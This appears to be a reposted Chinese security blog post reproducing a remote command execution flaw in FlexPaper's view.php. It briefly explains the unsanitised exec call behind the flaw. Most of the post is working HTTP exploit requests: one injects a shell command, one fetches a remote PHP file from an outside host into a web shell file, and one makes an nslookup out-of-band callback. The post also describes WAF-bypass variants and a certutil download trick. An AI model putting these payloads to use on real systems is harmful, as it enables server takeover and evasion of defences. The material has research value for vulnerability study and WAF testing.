本文主要是介绍flexpaper 远程命令执行,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
flexpaper 远程命令执行
这个是有POC的,先简单复现一下
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.docx"+%26+echo+shell+>+shel233l.txt+%23&page=exp&format=swf&callback=callback&isSplit=true HTTP/1.1 Host: 192.168.50.22 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close
HTTP/1.1 200 OK Date: Sat, 20 Apr 2024 05:06:10 GMT Server: Apache Set-Cookie: PHPSESSID=ac0c7cfca1fd60eca686482c25af2a61; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Accept-Ranges: bytes Connection: close Content-Type: application/x-shockwave-flash
简单分析
重要的函数就是trans_pdf2png , trans_pdftk ,也就是tool_transform.php 里面的几个函数,可以看到他从view.php中获取的数据直接传到这几个函数里去了,这几个函数在tool_transform.php
把几个传入的参数拼接了,直接exec运行
也就是直接使用管道符隔开就能运行别的
修复?
看下官方是怎么修复的,直接把view.php删掉了
但是tool_transform.php没删
增加难度
分别加上了xx服的af和ct的雷池试下,绕过这两个设备得到了两个可行的poc(已提交给了他们的PM)
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.pdf&format=swf&isSplit=true&page=||%22C%3A%5CProgram+Files+%28x86%29%5CTEC%5CWebServer%5Cphp%5Cphp.exe%22+-r+%22echo+file_get_contents%28%27http%3A%2F%2F192.168.10.248%2Fserver%2Fs.php%27%29%3B%22%20>>ttttt.php HTTP/1.1 Host: 192.168.10.197:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=a7a6c12f890da30b8908adbbcd6b1e41; ipg_session=d2dbf9993acef536d63350f7ceb06e4ccbf2f550 Connection: close
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=1.pdf&format=swf&isSplit=true&page=||nslookup%20yafjjulyfe.dgrh3.cn HTTP/1.1 Host: 192.168.10.197:8888 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=a7a6c12f890da30b8908adbbcd6b1e41; ipg_session=d2dbf9993acef536d63350f7ceb06e4ccbf2f550 Connection: close
雷池还可以用certutil -urlcache -f直接下文件,如果两个套娃套起来,一时没想到该怎么弄,后面某服af升级之后直接正则了这个url,那也确实没有什么好的办法了
这篇关于flexpaper 远程命令执行的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
